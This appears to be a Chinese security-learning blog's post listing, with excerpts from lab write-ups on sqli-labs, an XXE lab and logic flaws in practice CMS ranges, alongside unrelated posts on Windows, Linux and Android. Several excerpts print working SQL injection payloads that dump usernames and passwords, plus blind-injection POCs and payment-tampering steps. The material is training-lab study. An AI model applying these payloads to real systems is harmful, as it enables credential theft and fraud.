- 博客(46)
- 资源 (17)
- 收藏
- 关注
RSS订阅原创 pikachu验证XXE漏洞
有个xml参数,而且Content-Type: application/x-www-form-urlencoded,我们传入url编码后的xml内容试一下。接下来试试能不能读取系统文件内容。url编码后放入参数xml。接下来用bp抓包看下参数。先随便输入一个内容查看。
2024-03-02 22:07:09
188
原创 电脑竖屏显示了怎么回复原状
电脑屏幕变成这样 怎么恢复原状?1、登录系统2、在桌面上空白点击鼠标右键3、在右键菜单中选择“屏幕分辨率”,左键点击打开4、在窗口中“方向”位置选择“横向”5、保存设置win7桌面即可恢复到正常状态
2024-02-18 12:18:33
297
原创 解除磁盘只读模式
6.如果只读状态不是否,输入命令attributes disk clear readonly可以清楚只读状态。1.win+R键调出命令输入框,输入cmd回车或点击确定。5.attributes disk查看磁盘状态。4.select disk 0选择磁盘。2.命令行输入diskpart回车。3.list disk列出所有磁盘。
2024-02-18 12:07:46
305
原创 sqli.bypass靶场本地小皮环境(1-5关)
单引号报错id=1'双引号正常id=1'',应该是单引号闭合id=1'--+注释符用不了,%20和+都用不了%0a可以用没有报错,用布尔盲注,POC:id=1'%0aand%0asubstr('ss',1,1)='s'%0aand%0a'1'='1脚本跑数据比较方便。
2024-02-06 16:48:49
1167
原创 sqli.labs靶场(54-65关)
提示尝试是十次后数据库就重置,那我们尝试union原来是单引号闭合数据库:challenges,表名是:4c7k78qe8t,就一个表字段为:查出Secret Key:将获取的key值放到下面输入框点击提交就完成所有步骤。
2024-02-05 19:04:06
995
原创 sqli.labs靶场(41-53关)
可以使用布尔盲注POC:123')+or+substr(database(),1,1)='a'--+可以用布尔盲注,POC:123'+or+lenth(database())=1--+这关login_password是单引号闭合,可用布尔盲注。POC:111')--+,有报错信息,可以用报错注入。应该是报错了,一共三个字段,不显示错误可以用时间盲注。和48关差不多,也是时间盲注,需要单引号闭合。有报错信息,还得报错注入,单引号闭合。没有报错信息,得用盲注,时间盲注。单引号闭合,没有报错,还得是盲注。
2024-02-04 23:42:46
977
原创 sqli.labs靶场(23关到28a关)
爆数据:1' and 1=2 union select 1,2,group_concat(username,':',password) from users where '1'='1。爆库:31') unionunion select select 1,database(),3 and ('1')=('1。爆库POC:1')%26(substr(database(),1,1)='s')%26('1')=('1。爆库:1' and 1=2 union select 1,2,database()'
2024-02-01 18:06:02
1151
原创 sql注入案例总结
1、利用工具,网站,等收集信息寻找注入点2、找不到注入点果断换下一家,不要浪费时间(方向不对,努力白费)3、构造轮子多次尝试绕WAF4、生成POC5、跑出库名6、及时止步,远离犯罪。
2024-01-29 15:53:56
544
原创 sqli.labs靶场(8-17关)
爆users表字段名:id=1%27%20and%20if(substr((select group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='{database}'),{p},1)=\"{a}\",sleep(5),0)%20--+
2024-01-28 17:37:23
763
原创 sqli-labs靶场第七关
id=1' --+单引号报错,id=1" --+双引号不报错,可以判断是单引号闭合。id=1') --+也报错,尝试两个括号闭合,id=1')) --+不报错。
2024-01-28 00:02:32
268
原创 sqli-labs靶场(1-6关)
id=1') and 1=2 union select 1,2,group_concat(id,':',username,'>',password) from users--+ 爆出所有账号。id=1 and 1=2 union select 1,2,group_concat(id,':',username,'>',password) from users--+ 爆出所有账号。id=1') and 1=2 union select 1,database(),version() --+ 查出库名,及版本号。
2024-01-27 18:05:08
937
原创 baijia靶场漏洞挖掘
这个是未注册的用户,通过批量注册可以探测到系统已有用户。打开我的地址,输入信息点击提交。点击个人中心>用户登录>这个是已注册的用户返回。,注入账号密码,抓包。
2024-01-25 16:35:33
391
原创 CmsEasy逻辑漏洞报告
一下赚了这么多钱,好开心。哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈哈。数量修改为-900,放包。进入商品界面,购买商品。开启抓包,然后点击购买。成功购买,查看会员中心。填写联系方式,并支付。
2024-01-25 15:15:07
383
原创 doyo靶场测试
这个接口可以爆破出已存在的账号704标识已存在的账号,703标识未注册的账号。竟然支付成功,待发货,查看财务记录,竟然一下多了13800元,哈哈。重新购买一件,数量改成-100提交订单,显示如下。找一个未注册账号,抓包,放两次包找到注册接口。购买数量0竟然可以下单并支付。注册,抓包,尝试批量注册。常看看能否提交并支付成功。
2024-01-24 22:23:59
354
原创 大米cms靶场漏洞报告
发现可以任意用户批量注册,一下注册了50个账号。可以登录,说明刚才批量注册成功。打开产品,购买一个,数量填-1。随便登录一个账号lyy105。1.点击注册,先注册用户。点击注册,抓包,批量注册。明显是一个支付逻辑漏洞。
2024-01-24 17:24:13
405
原创 墨者靶场登录密码重置漏洞分析溯源关卡
显示手机号不存在,下面提示:你已注册的手机号为:18868345809,输入获取验证码。获取到验证码,然后再把需要重置密码的手机号17101304128填入,点击重置密码。提示重置17101304128登录密码,我们。获得key,然后退出来提交key即可过关。注册并登录墨者学院,搜索登录密码重置。下图,填好信息点击获取。
2024-01-24 14:30:32
412
原创 zzcms靶场测试
(1)过滤输入的数据,对例如:“ ‘ ”,“ “ ”,” “,” on* “,script、iframe等危险字符进行严格的检查。对输出的数据也要检查,数据库里的值有可能会在一个大网站的多处都有输出,即使在输入做了编码等操作,在各处的输出点时也要进行检查。为了应对这些潜在的风险,企业应采取一系列的安全措施,包括但不限于更新软件至最新的安全补丁版本、加强内部管理和加密敏感信息,同时建立和完善安全策略和措施,并进行定期的安全检查和测试。(3)不仅在客户端做数据的验证与过滤,关键的过滤步骤在服务端进行。
2024-01-23 15:57:49
1584
原创 漏洞报告模板
漏洞归属单位:系统名称:漏洞名称:漏洞等级:漏洞类型:漏洞所在详细IP或URI:漏洞详情:漏洞影响:修复建议:后门、上传脚本、改动代码或配置等情况:
2024-01-23 14:31:55
697
原创 关注网络安全网站、博客或公众号可以帮助您了解最新的网络安全资讯、技术动态和安全事件。以下是一些建议您关注的网络安全相关网站、博客和公众号:
Wired Security(https://www.wiredsecurity.com/):这是一个关注网络安全、隐私保护和物联网安全的英文网站,提供技术文章和案例分析。DarkReading(https://www.darkreading.com/):这是一个关注信息安全、网络安全和风险管理的资讯网站,提供全球范围内的安全新闻和分析。FreeBuf(https://www.freebuf.com/):这是一个关注计算机安全、互联网技术分享的社区,提供丰富的技术文章、教程和安全事件分析。
2023-09-19 18:56:31
210
原创 主流编程语言有很多,以下是一些常见的编程语言及其作用:
主流编程语言Java:跨平台的桌面应用、Android;企业级应用、web开发、服务器后端。 Python:数据分析、人工智能、机器学习、Web开发。 C++:操作系统、嵌入式、驱动开发。 JavaScript:前端开发、后端开发、全栈开发。 PHP:网站开发。 C#:Windows桌面软件、.NET Web、服务器。 Swift:iOS开发。 以下是一些在线学习编程的网站:- freeCodeCamp.org:提供免费的编程课程,包括前端开发、后端开发、数据科学等。
2023-09-19 18:50:21
77
原创 Linux 常用命令
命令在正常执行结果后返回一个0值,如果命令出错可未完全完成,则返回一个 非零值(在shell中可用变量$?usermod 修改用户属性,包括用户的shell类型,用户组等,甚至还能改登录名。whereis 确定一个命令的二进制执行码,源码及帮助所在的位置。traceroute 显示到达某一主机所经由的路径及所使用的时间。例如:man dir 可以获取关于dir的使用信息。gzip/gunzip .gz文件的压缩/解压缩程序。nslookup 查询机器的IP地址和其对应的域名。
2023-09-11 12:45:03
52
原创 windows常用命令
显示目录文件和子目录列表可以使用通配符(?和 *),?表通配一个字符,*表通配任意字符*.后缀指定要查看后缀的文件。上面其实也可以为“ . 后缀”,例如dir *.exe 等于dir .exe/p每次显示一个列表屏幕。要查看下一屏,请按键盘上的任意键。/w以宽格式显示列表,在每一行上最多显示 5 个文件名或目录名。/s列出指定目录及所有子目录中出现的每个指定的文件名。比win环境下的查找快多了dir *.* -> a.txt 把当前目录文件列表写入a.txt。
2023-09-11 11:39:43
297
原创 了解一下src漏洞平台是什么,有哪些?
SRC(Security Researcher Acknowledgement Program)是各大互联网厂商开启的漏洞发现奖励计划,也就是我们常说的漏洞赏金计划(bug bounty),旨在鼓励广大的安全研究人员积极发现厂商产品或服务安全漏洞并向厂商提交漏洞报告,帮助厂商修补漏洞,保障整个互联网的安全。
2023-09-10 13:33:26
2743
原创 了解国内外安全事件,有哪些案例?
2月11日,路透社消息,根据英国政府网站上发布的招标文件,今年早些时候,英国外交部成为了一起严重网络安全事件的目标。3月28日,乌克兰重要电信运营商Ukrtelecom遭遇“强大的”网络攻击,导致全国服务中断。有分析指出,紧张的地缘政治是近期油价坚挺的重要原因,而美国寒冷天气带来的供应减少预期,进一步强化了目前市场供应中断的风险。3月1日,据Southern Standard报道,全球最大的轮胎制造商普利司通的美洲公司在上周日(美东时间2月27日)遭受网络攻击后,已经“断开”了其许多制造和翻新设施。
2023-09-10 12:41:21
588
原创 了解网络安全有哪些岗位?
负责规划设计网络安全检测方案,对安全设备日志和流量等安全数据进行检测,输出报告,分析检测数据,发现威胁,并报警响应,规划设计安全态势检测分析方案,进行安全态势检测和分析,给出网络安全态势的合理评价。负责对服务器、网络设备、安全产品、网络信息系统等进行安全维护、安全巡检、策略维护管理、配置变更、故障处置与安全分析等,消除和降低所发现的威胁。负责针对信息、信息系统、信息基础设施和网络进行分析,制定安全事件应急响应预案,对突发安全事件进行分析、处理,完成快速应急响应。
2023-09-10 11:42:07
40
原创 了解网络安全行业内有哪些公司?
深信服科技股份有限公司是一家专注于企业级安全、云计算与IT基础架构的产品和服务供应商。业务覆盖:中国、美国、马来西亚、印尼、泰国、新加坡、阿联酋、越南、缅甸、巴基斯坦、菲律宾、意大利、韩国等50多个国家和地区。奇安信科技集团股份有限公司成立于2014年,凭借持续的研发创新和以实战攻防为核心的安全能力,已发展成为国内领先的基于大数据、人工智能和安全运营技术的网络安全供应商。
2023-09-07 18:03:09
501
原创 blur
public static Bitmap doBlur(Bitmap sentBitmap) { int radius = 8; Bitmap bitmap;// if (canReuseInBitmap) { bitmap = sentBitmap;// } else {//
2015-06-10 19:09:11
389
转载 Android 应用的动画实践--View Animation篇
前言尝试搜索了一下android 动画的中文资料,很多都是一些枯燥的翻译api的一些文档,很少有系统讲解如何利用动画开发一个应用的资料,忽然,发现很多应用也不怎么注重动画在app的应用,想了想,自己尝试总结一下吧。因为,本人也不是什么动画制作师,没法把动画做得很绚丽,只好,利用内置的效果,进行简单加工,如何发挥,由各位的创意来定。鉴于,很多有关的android的动画资料里面,都是堆代码的,所以
2015-06-10 14:53:30
354
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人